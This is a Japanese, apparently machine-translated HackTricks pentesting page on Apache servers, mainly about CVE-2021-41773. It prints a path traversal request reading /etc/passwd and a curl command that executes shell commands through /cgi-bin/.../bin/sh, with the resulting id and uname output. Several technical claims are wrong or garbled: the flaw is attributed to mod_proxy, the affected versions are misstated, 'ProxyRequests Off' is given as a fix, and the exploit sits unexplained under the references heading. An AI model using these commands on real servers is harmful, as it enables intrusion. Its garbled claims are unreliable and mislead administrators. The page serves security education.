hacktricks/network-services-pentesting/pentesting-web/apache.md
2023-07-07 23:42:27 +00:00

5.9 KiB
Raw Blame History

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

実行可能なPHP拡張機能

Apacheサーバーで実行されている拡張機能を確認します。これらを検索するには、次のコマンドを実行します

grep -R -B1 "httpd-php" /etc/apache2

また、この設定を見つけることができる場所は以下の通りです:

/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf

CVE-2021-41773

概要

CVE-2021-41773は、Apache HTTP Serverの脆弱性であり、攻撃者がリモートで任意のファイルを読み取ることができる可能性があります。

影響を受けるバージョン

  • Apache HTTP Server 2.4.49以前

詳細

この脆弱性は、Apache HTTP Serverのmod_proxyモジュールに存在します。攻撃者は、特定の条件下でリクエストを送信することで、目的のファイルの内容を読み取ることができます。

攻撃者は、以下のようなリクエストを送信することで、ファイルの読み取りを行うことができます。

GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: example.com

この脆弱性を悪用すると、攻撃者はサーバー上の任意のファイルにアクセスできる可能性があります。これにより、機密情報の漏洩やシステムへの不正アクセスが可能となります。

対策方法

Apache HTTP Serverのバージョン2.4.50以降にアップグレードすることを強くお勧めします。また、アップグレードができない場合は、以下のワークアラウンドを適用することができます。

  1. Apache HTTP Serverの設定ファイルhttpd.confに以下の行を追加します。
<Directory "/">
    Require all denied
</Directory>
  1. mod_proxyモジュールを無効にします。
ProxyRequests Off

これにより、攻撃者はリモートでのファイルの読み取りを防ぐことができます。

参考情報

curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥